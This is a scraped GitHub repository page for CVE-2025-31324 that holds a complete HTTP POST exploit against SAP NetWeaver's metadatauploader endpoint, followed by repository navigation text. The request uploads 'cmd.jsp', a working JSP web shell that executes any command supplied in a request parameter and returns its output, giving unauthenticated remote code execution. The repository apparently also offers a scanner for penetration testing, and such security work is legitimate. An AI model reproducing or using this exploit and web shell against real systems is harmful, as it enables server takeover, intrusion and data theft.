CVE-2025-31324

CVE-2025-31324, SAP Exploit

POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive
Content-Length: 636
Content-Type: multipart/form-data; boundary=11111111111111111111111111

--11111111111111111111111111
Content-Disposition: form-data; name="file"; filename="cmd.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
    String cmd = request.getParameter("cmd");
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>

--11111111111111111111111111--

CVE-2025-31324 SAP Penetration Testing SAP ABAP Code Scanner

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
README.md		README.md
Scanner_CVE-2025-31324.py		Scanner_CVE-2025-31324.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

CVE-2025-31324

About

Uh oh!

Releases

Packages

Languages

redrays-io/CVE-2025-31324

Folders and files

Latest commit

History

Repository files navigation

CVE-2025-31324

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages